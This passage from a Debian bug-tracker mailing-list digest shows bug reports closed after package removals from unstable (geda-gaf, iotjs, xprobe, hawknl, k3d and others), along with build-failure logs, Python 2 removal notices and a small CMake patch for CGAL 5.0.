the bug priority is set to normal and retitle the issue to "RM: PKG -- removal triggered by the Python2 removal". - If the package has still many users (popcon >= 300), or is needed to build another package which cannot be removed, document that by adding the "py2keep" user tag (not replacing the py2remove tag), using the debian-pyt...@lists.debian.org user. Also any dependencies on an unversioned python package (python, python-dev) must not be used, same with the python shebang. These have to be replaced by python2/python2.7 dependencies and shebang. This is the least preferred option. If the conversion or removal needs action on another package first, please document the blocking by using the BTS affects command, like affects + src:geda-gaf If there is no py2removal bug for that reverse-dependency, please file a bug on this package (similar to this bug report). If there are questions, please refer to the wiki page for the removal: https://wiki.debian.org/Python/2Removal, or ask for help on IRC #debian-python, or the debian-pyt...@lists.debian.org mailing list. --- End Message --- --- Begin Message --- Version: 1:1.8.2-11+rm Dear submitter, as the package geda-gaf has just been removed from the Debian archive unstable we hereby close the associated bug reports. We are sorry that we couldn't deal with your issue properly. For details on the removal, please see https://bugs.debian.org/1008700 The version of this package that was in Debian prior to this removal can still be found using http://snapshot.debian.org/. Please note that the changes have been done on the master archive and will not propagate to any mirrors until the next dinstall run at the earliest. This message was generated automatically; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org. Debian distribution maintenance software pp. Thorsten Alteholz (the ftpmaster behind the curtain)--- End Message ---
Bug#885195: marked as done (geda-gaf: please upload latest version which uses guile-2.2)
Your message dated Sat, 13 Aug 2022 18:07:25 + with message-id and subject line Bug#1008700: Removed package(s) from unstable has caused the Debian Bug report #885195, regarding geda-gaf: please upload latest version which uses guile-2.2 to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 885195: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=885195 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Source: geda-gaf Severity: normal I'd like to remove guile-2.0 before the buster release, so please migrate to guile-2.2 when you can. Thanks -- Rob Browning rlb @defaultvalue.org and @debian.org GPG as of 2011-07-10 E6A9 DA3C C9FD 1FF8 C676 D2C4 C0F0 39E9 ED1B 597A GPG as of 2002-11-03 14DD 432F AE39 534D B592 F9A0 25C8 D377 8C7E 73A4 --- End Message --- --- Begin Message --- Version: 1:1.8.2-11+rm Dear submitter, as the package geda-gaf has just been removed from the Debian archive unstable we hereby close the associated bug reports. We are sorry that we couldn't deal with your issue properly. For details on the removal, please see https://bugs.debian.org/1008700 The version of this package that was in Debian prior to this removal can still be found using http://snapshot.debian.org/. Please note that the changes have been done on the master archive and will not propagate to any mirrors until the next dinstall run at the earliest. This message was generated automatically; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org. Debian distribution maintenance software pp. Thorsten Alteholz (the ftpmaster behind the curtain)--- End Message ---
Bug#967916: marked as done (Depends on geda-gaf)
Your message dated Sat, 13 Aug 2022 18:04:43 + with message-id and subject line Bug#1016664: Removed package(s) from unstable has caused the Debian Bug report #967916, regarding Depends on geda-gaf to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 967916: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=967916 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Package: easyspice Severity: serious geda-gaf is scheduled for removal (#965098) and easyspice depends on it. Cheers, Moritz --- End Message --- --- Begin Message --- Version: 0.6.8-3+rm Dear submitter, as the package easyspice has just been removed from the Debian archive unstable we hereby close the associated bug reports. We are sorry that we couldn't deal with your issue properly. For details on the removal, please see https://bugs.debian.org/1016664 The version of this package that was in Debian prior to this removal can still be found using http://snapshot.debian.org/. Please note that the changes have been done on the master archive and will not propagate to any mirrors until the next dinstall run at the earliest. This message was generated automatically; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org. Debian distribution maintenance software pp. Thorsten Alteholz (the ftpmaster behind the curtain)--- End Message ---
Bug#1012951: marked as done (iotjs: ftbfs with GCC-12)
Your message dated Sat, 13 Aug 2022 18:03:40 + with message-id and subject line Bug#101: Removed package(s) from unstable has caused the Debian Bug report #1012951, regarding iotjs: ftbfs with GCC-12 to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 1012951: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1012951 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Package: src:iotjs Version: 1.0+715-1 Severity: normal Tags: sid bookworm User: debian-...@lists.debian.org Usertags: ftbfs-gcc-12 [This bug is targeted to the upcoming bookworm release] Please keep this issue open in the bug tracker for the package it was filed for. If a fix in another package is required, please file a bug for the other package (or clone), and add a block in this package. Please keep the issue open until the package can be built in a follow-up test rebuild. The package fails to build in a test rebuild on at least amd64 with gcc-12/g++-12, but succeeds to build with gcc-11/g++-11. The severity of this report will be raised before the bookworm release. The full build log can be found at: http://qa-logs.debian.net/2022/06/09/gcc12/iotjs_1.0+715-1_unstable_gcc12.log The last lines of the build log are at the end of this report. To build with GCC 11, either set CC=gcc-11 CXX=g++-11 explicitly, or install the gcc, g++, gfortran, ... packages from experimental. apt-get -t=experimental install g++ Common build failures are new warnings resulting in build failures with -Werror turned on, or new/dropped symbols in Debian symbols files. For other C/C++ related build failures see the porting guide at http://gcc.gnu.org/gcc-11/porting_to.html GCC 11 defaults to the GNU++17 standard. If your package installs header files in /usr/include, please don't work around C++17 issues by choosing a lower C++ standard for the package build, but fix these issues to build with the C++17 standard. [...] cd /<>/obj-x86_64-linux-gnu/deps/libtuv && /usr/bin/cmake -E touch /<>/obj-x86_64-linux-gnu/deps/libtuv/src/libtuv-stamp/libtuv-install /<>/deps/jerry/jerry-libm/trig.c: In function ‘__kernel_rem_pio2.constprop’: /<>/deps/jerry/jerry-libm/trig.c:400:14: error: ‘fq’ may be used uninitialized [-Werror=maybe-uninitialized] 400 | fw = fq[0] - fw; |~~^~~ /<>/deps/jerry/jerry-libm/trig.c:193:24: note: ‘fq’ declared here 193 | double z, fw, f[20], fq[20], q[20]; |^~ /<>/deps/jerry/jerry-libm/trig.c:400:14: error: ‘fq’ may be used uninitialized [-Werror=maybe-uninitialized] 400 | fw = fq[0] - fw; |~~^~~ /<>/deps/jerry/jerry-libm/trig.c:193:24: note: ‘fq’ declared here 193 | double z, fw, f[20], fq[20], q[20]; |^~ cd /<>/obj-x86_64-linux-gnu/deps/http-parser && /usr/bin/cmake -E touch /<>/obj-x86_64-linux-gnu/deps/http-parser/src/http-parser-stamp/http-parser-install [ 45%] Completed 'libtuv' /usr/bin/cmake -E make_directory /<>/obj-x86_64-linux-gnu/CMakeFiles /usr/bin/cmake -E touch /<>/obj-x86_64-linux-gnu/CMakeFiles/libtuv-complete [ 47%] Completed 'http-parser' /usr/bin/cmake -E make_directory /<>/obj-x86_64-linux-gnu/CMakeFiles /usr/bin/cmake -E touch /<>/obj-x86_64-linux-gnu/deps/libtuv/src/libtuv-stamp/libtuv-done /usr/bin/cmake -E touch /<>/obj-x86_64-linux-gnu/CMakeFiles/http-parser-complete make[3]: Leaving directory '/<>/obj-x86_64-linux-gnu' /usr/bin/cmake -E touch /<>/obj-x86_64-linux-gnu/deps/http-parser/src/http-parser-stamp/http-parser-done [ 47%] Built target libtuv make[3]: Leaving directory '/<>/obj-x86_64-linux-gnu' [ 47%] Built target http-parser cc1: all warnings being treated as errors make[6]: *** [jerry-libm/CMakeFiles/jerry-libm.dir/build.make:468: jerry-libm/CMakeFiles/jerry-libm.dir/trig.c.o] Error 1 make[6]: Leaving directory '/<>/obj-x86_64-linux-gnu/deps/jerry-host' make[5]: *** [CMakeFiles/Makefile2:199: jerry-libm/CMakeFiles/jerry-libm.dir/all] Error 2 make[5]: Leaving directory '/<>/obj-x86_64-linux-gnu/deps/jerry-host' make[4]: *** [Makefile:136: all] Error 2 make[4]: Leaving directory '/<>/obj-x86_64-linux-gnu/deps/jerry-host' make[3]: *** [CMakeFiles/hostjerry.dir/build.make:89: deps/jerry-host/src/hostjerry-stamp/hostjerry-build] Error 2 make[3]: Leaving directory '/<>/obj-x86_64-linux-gnu' make[2]: *** [CMakeFiles/Makefile2:96: CMakeFiles/hostjerry.dir/all] Error 2 make[2]: *** Waiting for unfinished jobs In file included from /<>/obj-x86_64-linux-gnu/deps/jerry/jerry-all-in.c:13: /<>/deps/jerry/jerry-core/ecma/base/ecma-helpers-string.c: In
Bug#1011124: marked as done (iotjs: is this package maintained?)
Your message dated Sat, 13 Aug 2022 18:03:40 + with message-id and subject line Bug#101: Removed package(s) from unstable has caused the Debian Bug report #1011124, regarding iotjs: is this package maintained? to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 1011124: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1011124 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Source: iotjs Version: 1.0+715-1 Severity: serious Justification: In the opinion of a QA person the package is unsuitable for release. Hi! This package appears to be unmaintained, and: * has a large set of CVEs reported. They are also untriaged and have seen no maintainer response. * blocks Python 2 removal I thus believe our users are better served by not being exposed to the package in its current state. If you disagree, please just close this bug. Meow! --- End Message --- --- Begin Message --- Version: 1.0+715-1+rm Dear submitter, as the package iotjs has just been removed from the Debian archive unstable we hereby close the associated bug reports. We are sorry that we couldn't deal with your issue properly. For details on the removal, please see https://bugs.debian.org/101 The version of this package that was in Debian prior to this removal can still be found using http://snapshot.debian.org/. Please note that the changes have been done on the master archive and will not propagate to any mirrors until the next dinstall run at the earliest. This message was generated automatically; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org. Debian distribution maintenance software pp. Thorsten Alteholz (the ftpmaster behind the curtain)--- End Message ---
Processed: src:gjiten: invalid maintainer address
Processing commands for cont...@bugs.debian.org: > found 1014135 2.6-3.1 Bug #1014135 [src:gjiten] src:gjiten: invalid maintainer address Marked as found in versions gjiten/2.6-3.1. > End of message, stopping processing here. Please contact me if you need assistance. -- 1014135: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1014135 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Bug#1016550: marked as done (gfbgraph: unmaintained, depends on old libsoup)
Your message dated Sat, 13 Aug 2022 17:59:54 + with message-id and subject line Bug#1016712: Removed package(s) from unstable has caused the Debian Bug report #1016550, regarding gfbgraph: unmaintained, depends on old libsoup to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 1016550: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1016550 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Source: gfbgraph Version: 0.2.5-2 Severity: serious gfbgraph needs to be ported to the new librest 1.0 API and libsoup3. Because I don't intend to have more than one version of librest in Debian, gfbgraph will need to be removed. There really isn't anything else using gfbgraph currently since core GNOME has stopped using it because of this issue. Thank you, Jeremy Bicha --- End Message --- --- Begin Message --- Version: 0.2.5-2+rm Dear submitter, as the package gfbgraph has just been removed from the Debian archive unstable we hereby close the associated bug reports. We are sorry that we couldn't deal with your issue properly. For details on the removal, please see https://bugs.debian.org/1016712 The version of this package that was in Debian prior to this removal can still be found using http://snapshot.debian.org/. Please note that the changes have been done on the master archive and will not propagate to any mirrors until the next dinstall run at the earliest. This message was generated automatically; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org. Debian distribution maintenance software pp. Thorsten Alteholz (the ftpmaster behind the curtain)--- End Message ---
Bug#981009: charybdis abandoned upstream, do not ship in bullseye
On 2022-08-02 13:46:44, Chris Hofstaedtler wrote: > * Antoine Beaupre : >> After a somewhat long period of uncertainty, Charybdis has been >> finally abandoned upstream. The official git repository here: >> >> https://github.com/charybdis-ircd/charybdis >> >> .. is marked as "archived by the owner [and] read-only". > > Is it time to file an RM bug, given that its probably going to be > solanum? Sure, feel free. -- Be yourself. Everyone else is already taken! - Oscar Wilde
Bug#1016743: marked as done (zalign: autopkgtest failure on 32 bit architectures: Segmentation fault)
Your message dated Sat, 13 Aug 2022 17:53:32 + with message-id and subject line Bug#1016909: Removed package(s) from unstable has caused the Debian Bug report #1016743, regarding zalign: autopkgtest failure on 32 bit architectures: Segmentation fault to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 1016743: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1016743 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Source: zalign Version: 0.9.1-6 Severity: serious User: debian...@lists.debian.org Usertags: fails-always Dear maintainer(s), You recently added an autopkgtest to your package zalign, great. However, it fails. Currently this failure is blocking the migration to testing [1]. Can you please investigate the situation and fix it? I copied some of the output at the bottom of this report. More information about this bug and the reason for filing it can be found on https://wiki.debian.org/ContinuousIntegration/RegressionEmailInformation Paul [1] https://qa.debian.org/excuses.php?package=zalign https://ci.debian.net/data/autopkgtest/testing/armhf/z/zalign/23914703/log.gz [93m[1mRunning Tests[0m [93m[1mTest 1[0m Stage 1: Distribute data to all nodes - # File parameters S sequence: 104 characters Filename: dd T sequence: 104 characters Filename: rt # Performance parameters Number of 'split' submatrices: 1 Available nodes:1 Horizontal block divisions:10 Vertical block divisions: 10 # Scoring parameters Match: 1 Mismatch: -3 Gap Opening: -5 Gap Extension: -2 Stage 2: Find best scores - Showing progress information for root node (rank 0): split 1/1: || 0%* | 1%* | 2%** | 3%** | 4%** | 5%*** | 6%*** | 7% | 8% | 9% | 10%* | 11%* | 12%** | 13%** | 14%** | 15%*** | 16%*** | 17% | 18% | 19% | 20%* | 21%* | 22%** | 23%** | 24%** | 25%*** | 26%*** | 27% | 28% |
Bug#1016241: marked as done (xprobe: FTBFS: tcp.cc:31:15: error: ‘time’ was not declared in this scope)
Your message dated Sat, 13 Aug 2022 17:54:24 + with message-id and subject line Bug#1016899: Removed package(s) from unstable has caused the Debian Bug report #1016241, regarding xprobe: FTBFS: tcp.cc:31:15: error: ‘time’ was not declared in this scope to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 1016241: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1016241 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Source: xprobe Version: 0.3-5 Severity: serious Justification: FTBFS Tags: bookworm sid ftbfs User: lu...@debian.org Usertags: ftbfs-20220728 ftbfs-bookworm Hi, During a rebuild of all packages in sid, your package failed to build on amd64. Relevant part (hopefully): > g++ -g -O2 -ffile-prefix-map=/<>=. -fstack-protector-strong > -Wformat -Werror=format-security -fPIC -I/usr/include/pcap -I. -Wall -c -O2 > Layer2.cc > TX_IP.cc: In member function ‘virtual int usipp::TX_IP::sendpack(void*, > size_t, sockaddr*)’: > TX_IP.cc:33:5: warning: this ‘if’ clause does not guard... > [-Wmisleading-indentation] >33 | if (tx_timeout != false) > | ^~ > TX_IP.cc:37:9: note: ...this statement, but the latter is misleadingly > indented as if it were guarded by the ‘if’ >37 | int r; > | ^~~ > misc.cc: In function ‘short unsigned int usipp::in_cksum(short unsigned int*, > int, bool)’: > misc.cc:21:17: warning: ISO C++17 does not allow ‘register’ storage class > specifier [-Wregister] >21 | register long sum;/* assumes long == 32 bits */ > | ^~~ > misc.cc:23:20: warning: ISO C++17 does not allow ‘register’ storage class > specifier [-Wregister] >23 | register u_short answer; /* assumes u_short == 16 bits */ > |^~ > tcp.cc: In constructor ‘usipp::TCP::TCP(const char*)’: > tcp.cc:31:15: error: ‘time’ was not declared in this scope >31 | srand(time(NULL)); > | ^~~~ > tcp.cc:18:1: note: ‘time’ is defined in header ‘’; did you forget to > ‘#include ’? >17 | #include > +++ |+#include >18 | #include > udp.cc: In member function ‘virtual int usipp::UDP::init_device(char*, int, > size_t)’: > udp.cc:217:31: warning: ISO C++ forbids converting a string constant to > ‘char*’ [-Wwrite-strings] > 217 | r = Layer2::setfilter("udp"); > | ^ > datalink.cc: In member function ‘virtual int usipp::Pcap::sniffpack(void*, > size_t)’: > datalink.cc:344:25: error: ‘time’ was not declared in this scope > 344 | start = time(NULL); > | ^~~~ > tcp.cc: In member function ‘virtual int usipp::TCP::init_device(char*, int, > size_t)’: > tcp.cc:321:31: warning: ISO C++ forbids converting a string constant to > ‘char*’ [-Wwrite-strings] > 321 | r = Layer2::setfilter("tcp"); > | ^ > datalink.cc:19:1: note: ‘time’ is defined in header ‘’; did you forget > to ‘#include ’? >18 | #include > +++ |+#include >19 | > datalink.cc:356:30: error: ‘time’ was not declared in this scope > 356 | if ((time(NULL) - start) > d_tv.tv_sec) { > | ^~~~ > datalink.cc:356:30: note: ‘time’ is defined in header ‘’; did you > forget to ‘#include ’? > make[2]: *** [Makefile:27: datalink.o] Error 1 The full build log is available from: http://qa-logs.debian.net/2022/07/28/xprobe_0.3-5_unstable.log All bugs filed during this archive rebuild are listed at: https://bugs.debian.org/cgi-bin/pkgreport.cgi?tag=ftbfs-20220728;users=lu...@debian.org or: https://udd.debian.org/bugs/?release=na=ign=7=7=only=ftbfs-20220728=lu...@debian.org=1=1=1=1#results A list of current common problems and possible solutions is available at http://wiki.debian.org/qa.debian.org/FTBFS . You're welcome to contribute! If you reassign this bug to another package, please marking it as 'affects'-ing this package. See https://www.debian.org/Bugs/server-control#affects If you fail to reproduce this, please provide a build log and diff it with mine so that we can identify if something relevant changed in the meantime. --- End Message --- --- Begin Message --- Version: 0.3-5+rm Dear submitter, as the package xprobe has just been removed from the Debian archive unstable we hereby close the associated bug reports. We are sorry that we couldn't deal with your issue properly. For details on the removal, please see https://bugs.debian.org/1016899 The version of this package that
Bug#999277: marked as done (hawknl: missing required debian/rules targets build-arch and/or build-indep)
Your message dated Sat, 13 Aug 2022 17:48:24 + with message-id and subject line Bug#1016964: Removed package(s) from unstable has caused the Debian Bug report #999277, regarding hawknl: missing required debian/rules targets build-arch and/or build-indep to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 999277: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=999277 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Source: hawknl Version: 1.6.8+dfsg2-1 Severity: important Justification: Debian Policy section 4.9 Tags: bookworm sid User: debian...@lists.debian.org Usertags: missing-build-arch-indep Dear maintainer, Your package does not include build-arch and/or build-indep targets in debian/rules. This is required by Debian Policy section 4.9, since 2012. https://www.debian.org/doc/debian-policy/ch-source.html#main-building-script-debian-rules Please note that this is also a sign that the packaging of this software could benefit from a refresh. For example, packages using 'dh' cannot be affected by this issue. This mass bug filing was discussed on debian-devel@ in https://lists.debian.org/debian-devel/2021/11/msg00052.html . The severity of this bug will be changed to 'serious' after a month. Best, Lucas --- End Message --- --- Begin Message --- Version: 1.6.8+dfsg2-1+rm Dear submitter, as the package hawknl has just been removed from the Debian archive unstable we hereby close the associated bug reports. We are sorry that we couldn't deal with your issue properly. For details on the removal, please see https://bugs.debian.org/1016964 The version of this package that was in Debian prior to this removal can still be found using http://snapshot.debian.org/. Please note that the changes have been done on the master archive and will not propagate to any mirrors until the next dinstall run at the earliest. This message was generated automatically; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org. Debian distribution maintenance software pp. Thorsten Alteholz (the ftpmaster behind the curtain)--- End Message ---
Bug#965579: marked as done (hawknl: Removal of obsolete debhelper compat 5 and 6 in bookworm)
Your message dated Sat, 13 Aug 2022 17:48:24 + with message-id and subject line Bug#1016964: Removed package(s) from unstable has caused the Debian Bug report #965579, regarding hawknl: Removal of obsolete debhelper compat 5 and 6 in bookworm to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 965579: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=965579 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Source: hawknl Version: 1.6.8+dfsg2-1 Severity: normal Usertags: compat-5-6-removal Hi, The package hawknl uses debhelper with a compat level of 5 or 6, which is deprecated and scheduled for removal[1]. Please bump the debhelper compat at your earliest convenience /outside the freeze/! * Compat 13 is recommended (supported in stable-backports) * Compat 7 is the bare minimum PLEASE KEEP IN MIND THAT the release team *DOES NOT* accept uploads with compat bumps during the freeze. If there is any risk that the fix for this bug might not migrate to testing before 2021-01-01[3] then please postpone the fix until after the freeze. At the time of filing this bug, compat 5 and 6 are expected to be removed "some time during the development cycle of bookworm". Thanks, ~Niels [1] https://lists.debian.org/debian-devel/2020/07/msg00065.html [2] https://release.debian.org/bullseye/FAQ.html [3] The choice of 2021-01-01 as a "deadline" is set before the actual freeze deadline to provide a safe cut off point for most people. Mind you, it is still your responsibility to ensure that the upload makes it into testing even if you upload before that date. --- End Message --- --- Begin Message --- Version: 1.6.8+dfsg2-1+rm Dear submitter, as the package hawknl has just been removed from the Debian archive unstable we hereby close the associated bug reports. We are sorry that we couldn't deal with your issue properly. For details on the removal, please see https://bugs.debian.org/1016964 The version of this package that was in Debian prior to this removal can still be found using http://snapshot.debian.org/. Please note that the changes have been done on the master archive and will not propagate to any mirrors until the next dinstall run at the earliest. This message was generated automatically; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org. Debian distribution maintenance software pp. Thorsten Alteholz (the ftpmaster behind the curtain)--- End Message ---
Bug#936812: marked as done (ladish: Python2 removal in sid/bullseye)
Your message dated Sat, 13 Aug 2022 17:46:53 + with message-id and subject line Bug#1016984: Removed package(s) from unstable has caused the Debian Bug report #936812, regarding ladish: Python2 removal in sid/bullseye to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 936812: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=936812 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Package: src:ladish Version: 1+dfsg0-5.1 Severity: normal Tags: sid bullseye User: debian-pyt...@lists.debian.org Usertags: py2removal Python2 becomes end-of-live upstream, and Debian aims to remove Python2 from the distribution, as discussed in https://lists.debian.org/debian-python/2019/07/msg00080.html Your package either build-depends, depends on Python2, or uses Python2 in the autopkg tests. Please stop using Python2, and fix this issue by one of the following actions. - Convert your Package to Python3. This is the preferred option. In case you are providing a Python module foo, please consider dropping the python-foo package, and only build a python3-foo package. Please don't drop Python2 modules, which still have reverse dependencies, just document them. This is the preferred option. - If the package is dead upstream, cannot be converted or maintained in Debian, it should be removed from the distribution. If the package still has reverse dependencies, raise the severity to "serious" and document the reverse dependencies with the BTS affects command. If the package has no reverse dependencies, confirm that the package can be removed, reassign this issue to ftp.debian.org, make sure that the bug priority is set to normal and retitle the issue to "RM: PKG -- removal triggered by the Python2 removal". - If the package has still many users (popcon >= 300), or is needed to build another package which cannot be removed, document that by adding the "py2keep" user tag (not replacing the py2remove tag), using the debian-pyt...@lists.debian.org user. Also any dependencies on an unversioned python package (python, python-dev) must not be used, same with the python shebang. These have to be replaced by python2/python2.7 dependencies and shebang. This is the least preferred option. If the conversion or removal needs action on another package first, please document the blocking by using the BTS affects command, like affects + src:ladish If there is no py2removal bug for that reverse-dependency, please file a bug on this package (similar to this bug report). If there are questions, please refer to the wiki page for the removal: https://wiki.debian.org/Python/2Removal, or ask for help on IRC #debian-python, or the debian-pyt...@lists.debian.org mailing list. --- End Message --- --- Begin Message --- Version: 1+dfsg0-6+rm Dear submitter, as the package ladish has just been removed from the Debian archive unstable we hereby close the associated bug reports. We are sorry that we couldn't deal with your issue properly. For details on the removal, please see https://bugs.debian.org/1016984 The version of this package that was in Debian prior to this removal can still be found using http://snapshot.debian.org/. Please note that the changes have been done on the master archive and will not propagate to any mirrors until the next dinstall run at the earliest. This message was generated automatically; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org. Debian distribution maintenance software pp. Thorsten Alteholz (the ftpmaster behind the curtain)--- End Message ---
Bug#946228: marked as done (FTBFS with CGAL 5.0)
Your message dated Sat, 13 Aug 2022 17:47:55 + with message-id and subject line Bug#1016983: Removed package(s) from unstable has caused the Debian Bug report #946228, regarding FTBFS with CGAL 5.0 to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 946228: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=946228 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Source: k3d Version: 0.8.0.6-8 Severity: serious Tags: ftbfs Control: block 944417 by -1 Hi, the transition to CGAL 5.0 started (see bug #944417) and your package FTBFS. Attached are two patches that fix the problem. In addition, one needs to add "Build-Depends: libcgal-dev (>= 5.0~). But just applying these two patches is not enough to unblock the transition due to bug #946225. Best regards, Joachim Index: k3d-0.8.0.6/CMakeLists.txt === --- k3d-0.8.0.6.orig/CMakeLists.txt +++ k3d-0.8.0.6/CMakeLists.txt @@ -7,7 +7,7 @@ IF(${CMAKE_MAJOR_VERSION} GREATER 3 OR $ CMAKE_POLICY(SET CMP0026 OLD) ENDIF() -set(CMAKE_CXX_STANDARD 11) +set(CMAKE_CXX_STANDARD 14) SET(CMAKE_MODULE_PATH "${CMAKE_CURRENT_SOURCE_DIR}/cmake/modules") Index: k3d-0.8.0.6/cmake/modules/K3DFindCGAL.cmake === --- k3d-0.8.0.6.orig/cmake/modules/K3DFindCGAL.cmake +++ k3d-0.8.0.6/cmake/modules/K3DFindCGAL.cmake @@ -7,11 +7,6 @@ FIND_PATH(K3D_CGAL_INCLUDE_DIR CGAL ) MARK_AS_ADVANCED(K3D_CGAL_INCLUDE_DIR) -FIND_LIBRARY(K3D_CGAL_LIBRARY CGAL - DOC "The CGAL library" - ) -MARK_AS_ADVANCED(K3D_CGAL_LIBRARY) - FIND_LIBRARY(K3D_MPFR_LIBRARY mpfr DOC "The mpfr library" ) @@ -22,7 +17,7 @@ FIND_LIBRARY(K3D_GMP_LIBRARY gmp ) MARK_AS_ADVANCED(K3D_GMP_LIBRARY) -IF(K3D_CGAL_INCLUDE_DIR AND K3D_CGAL_LIBRARY AND K3D_MPFR_LIBRARY AND K3D_GMP_LIBRARY) +IF(K3D_CGAL_INCLUDE_DIR AND K3D_MPFR_LIBRARY AND K3D_GMP_LIBRARY) SET(K3D_CGAL_FOUND 1) -ENDIF(K3D_CGAL_INCLUDE_DIR AND K3D_CGAL_LIBRARY AND K3D_MPFR_LIBRARY AND K3D_GMP_LIBRARY) +ENDIF(K3D_CGAL_INCLUDE_DIR AND K3D_MPFR_LIBRARY AND K3D_GMP_LIBRARY) Index: k3d-0.8.0.6/modules/cgal/CMakeLists.txt === --- k3d-0.8.0.6.orig/modules/cgal/CMakeLists.txt +++ k3d-0.8.0.6/modules/cgal/CMakeLists.txt @@ -6,7 +6,6 @@ K3D_BUILD_MODULE(k3d-cgal) K3D_CREATE_MODULE_PROXY(k3d-cgal) TARGET_LINK_LIBRARIES(k3d-cgal - ${K3D_CGAL_LIBRARY} ${K3D_MPFR_LIBRARY} ${K3D_GMP_LIBRARY} ${Boost_THREAD_LIBRARY} --- End Message --- --- Begin Message --- Version: 0.8.0.6-8+rm Dear submitter, as the package k3d has just been removed from the Debian archive unstable we hereby close the associated bug reports. We are sorry that we couldn't deal with your issue properly. For details on the removal, please see https://bugs.debian.org/1016983 The version of this package that was in Debian prior to this removal can still be found using http://snapshot.debian.org/. Please note that the changes have been done on the master archive and will not propagate to any mirrors until the next dinstall run at the earliest. This message was generated automatically; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org. Debian distribution maintenance software pp. Thorsten Alteholz (the ftpmaster behind the curtain)--- End Message ---
Bug#936777: marked as done (k3d: Python2 removal in sid/bullseye)
